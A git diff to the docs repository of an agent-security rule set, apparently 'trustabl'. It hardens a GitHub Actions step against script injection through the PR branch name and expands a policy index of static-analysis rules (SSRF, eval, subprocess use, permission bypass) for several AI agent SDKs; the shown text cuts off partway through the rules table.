diff --git a/.github/workflows/rulebook.yml b/.github/workflows/rulebook.yml
index 699b56b..a7c8ea2 100644
--- a/.github/workflows/rulebook.yml
+++ b/.github/workflows/rulebook.yml
@@ -25,10 +25,36 @@ jobs:
       - name: Checkout rulebook
         uses: actions/checkout@v4
 
+      # A coordinated rules change ships as paired PRs (one here, one in
+      # trustabl-rules). Validate this PR's docs against the matching production
+      # PR before either merges: check out trustabl-rules at a branch of the SAME
+      # name as this PR's head branch when it exists; otherwise fall back to main
+      # (push to main has an empty head_ref, so main always validates against the
+      # real production pack).
+      - name: Resolve trustabl-rules ref
+        id: rulesref
+        env:
+          RULES_TOKEN: ${{ secrets.RULES_REPO_TOKEN || github.token }}
+          # github.head_ref is the PR's branch name and is attacker-controlled.
+          # Hand it to the script through the environment; expanding it inside
+          # `run:` would splice it into the shell source (script injection).
+          HEAD_REF: ${{ github.head_ref }}
+        run: |
+          ref="$HEAD_REF"
+          # Ask for the fully qualified ref: a bare name is matched against the
+          # tail of every ref, so "fix" would also match refs/heads/user/fix.
+          if [ -n "$ref" ] && git ls-remote --exit-code --heads \
+            "https://x-access-token:${RULES_TOKEN}@github.com/trustabl/trustabl-rules.git" "refs/heads/$ref" >/dev/null 2>&1; then
+            echo "ref=$ref" >> "$GITHUB_OUTPUT"
+          else
+            echo "ref=main" >> "$GITHUB_OUTPUT"
+          fi
+
       - name: Checkout trustabl-rules
         uses: actions/checkout@v4
         with:
           repository: trustabl/trustabl-rules
+          ref: ${{ steps.rulesref.outputs.ref }}
           path: .rules
           token: ${{ secrets.RULES_REPO_TOKEN || github.token }}
 
@@ -59,10 +85,36 @@ jobs:
       - name: Checkout rulebook
         uses: actions/checkout@v4
 
+      # A coordinated rules change ships as paired PRs (one here, one in
+      # trustabl-rules). Validate this PR's docs against the matching production
+      # PR before either merges: check out trustabl-rules at a branch of the SAME
+      # name as this PR's head branch when it exists; otherwise fall back to main
+      # (push to main has an empty head_ref, so main always validates against the
+      # real production pack).
+      - name: Resolve trustabl-rules ref
+        id: rulesref
+        env:
+          RULES_TOKEN: ${{ secrets.RULES_REPO_TOKEN || github.token }}
+          # github.head_ref is the PR's branch name and is attacker-controlled.
+          # Hand it to the script through the environment; expanding it inside
+          # `run:` would splice it into the shell source (script injection).
+          HEAD_REF: ${{ github.head_ref }}
+        run: |
+          ref="$HEAD_REF"
+          # Ask for the fully qualified ref: a bare name is matched against the
+          # tail of every ref, so "fix" would also match refs/heads/user/fix.
+          if [ -n "$ref" ] && git ls-remote --exit-code --heads \
+            "https://x-access-token:${RULES_TOKEN}@github.com/trustabl/trustabl-rules.git" "refs/heads/$ref" >/dev/null 2>&1; then
+            echo "ref=$ref" >> "$GITHUB_OUTPUT"
+          else
+            echo "ref=main" >> "$GITHUB_OUTPUT"
+          fi
+
       - name: Checkout trustabl-rules
         uses: actions/checkout@v4
         with:
           repository: trustabl/trustabl-rules
+          ref: ${{ steps.rulesref.outputs.ref }}
           path: .rules
           token: ${{ secrets.RULES_REPO_TOKEN || github.token }}
 
diff --git a/POLICY_INDEX.md b/POLICY_INDEX.md
index 35304fe..6c410b1 100644
--- a/POLICY_INDEX.md
+++ b/POLICY_INDEX.md
@@ -3,8 +3,9 @@
 
 All shipped rules across every SDK. ID prefix denotes the rule family:
 `CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK,
-`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN`
-agent / subagent scope, `2NN` repo scope.
+`MCP-` Model Context Protocol, `LC-` LangChain / LangGraph, `CREW-` CrewAI,
+`AG2-` AutoGen / AG2, `VAI-` Vercel AI SDK, `PYD-` Pydantic AI. Within a
+family: `NNN` tool-scope, `1NN` agent / subagent scope, `2NN` repo scope.
 
 Risk score = `severity_weight × confidence × 100` (engine formula; weights:
 low=0.15, medium=0.40, high=0.70). Higher = worse.
@@ -37,133 +38,184 @@ Users can contribute their own policies by: ## Totals -| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | -| ---------------------- | ------ | ------ | -------- | ----- | ------- | -------------------------------------------------------- | -| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | -| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | -| Google ADK | 14 | 11 | 0 | 1 | 26 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | -| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | [mcp/POLICY_INDEX.md](mcp/POLICY_INDEX.md) | -| LangChain / LangGraph | 11 | 3 | 0 | 1 | 15 | [langchain/POLICY_INDEX.md](langchain/POLICY_INDEX.md) | -| **All** | **77** | **31** | **2** | **7** | **117** | | +| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | +| ---------------------- | ------- | ------ | -------- | ------ | ------- | ---------------------------------------------------------- | +| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | +| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | +| Google ADK | 14 | 11 | 0 | 1 | 26 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | +| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | [mcp/POLICY_INDEX.md](mcp/POLICY_INDEX.md) | +| LangChain / LangGraph | 11 | 3 | 0 | 1 | 15 | [langchain/POLICY_INDEX.md](langchain/POLICY_INDEX.md) | +| CrewAI | 7 | 6 | 0 | 1 | 14 | [crewai/POLICY_INDEX.md](crewai/POLICY_INDEX.md) | +| AutoGen / AG2 | 6 | 5 | 0 | 1 | 12 | [autogen/POLICY_INDEX.md](autogen/POLICY_INDEX.md) | +| Vercel AI SDK | 5 | 3 | 0 | 1 | 9 | [vercel_ai/POLICY_INDEX.md](vercel_ai/POLICY_INDEX.md) | +| Pydantic AI | 7 | 4 | 0 | 1 | 12 | [pydantic_ai/POLICY_INDEX.md](pydantic_ai/POLICY_INDEX.md) | +| **All** | **102** | **49** | **2** | **11** | **164** | | ## All rules -| 
| Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | -| --- | -------- | ---------- | -------- | ----------------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | -| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | -| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | -| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | 
[claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | 
[claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | 
[claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | -| 31 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low 
| 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 32 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 33 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 34 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 35 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 36 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | -| 37 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 38 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | -| 39 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 40 | 
OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | -| 41 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 42 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | -| 43 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 44 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 45 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 46 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 47 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 48 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | 
[openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 49 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 50 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 51 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 52 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 53 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 54 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 55 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 56 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a 
content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 57 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | -| 58 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 59 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 60 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 61 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | -| 62 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | -| 63 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 
64 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 65 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | -| 66 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | -| 67 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | -| 68 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | -| 69 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 70 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | -| 71 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 72 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body 
spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | -| 73 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | -| 74 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 75 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 76 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | -| 77 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 78 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 79 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 80 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | 
[google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 81 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 82 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 83 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 84 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 85 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 86 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 87 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 88 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | 
[google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | -| 89 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 90 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 91 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 92 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [mcp/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | -| 93 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [mcp/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | -| 94 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [mcp/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | -| 95 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [mcp/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | -| 96 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | -| 97 | MCP-009 | MCP | tool | 